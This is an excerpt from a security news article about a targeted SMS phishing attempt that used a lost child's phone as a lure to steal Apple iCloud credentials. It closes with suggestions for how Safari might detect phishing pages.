Recently, I heard from a security professional whose close friend received a targeted attempt to phish his Apple iCloud credentials. The phishing attack came several months after the friend’s child lost his phone at a public park in Virginia. The phish arrived via text message and claimed to have been sent from Apple. It said the device tied to his son’s phone number had been found, and that its precise location could be seen for the next 24 hours by clicking a link embedded in the text message.
That security professional source — referred to as “John” for simplicity’s sake — declined to be named or credited in this story because some of the actions he took to gain the knowledge presented here may run afoul of U.S. computer fraud and abuse laws.
Vindication is sweet, but the actions that “John” took would, of course, be impossible for most people. Even identifying a suspicious site can be difficult, especially as websites continue to coalesce around a handful of shared design motifs that are easy to replicate. So long as we rely upon passwords, phishing will continue to be a common and reasonably successful method for criminals to steal login credentials.
Perhaps it would be possible for Safari to automatically identify suspected phishing sites by comparing samples of the source code with known Apple ID login pages. Or, maybe Safari could alert users who use the same login details as their Apple ID on an insecure site.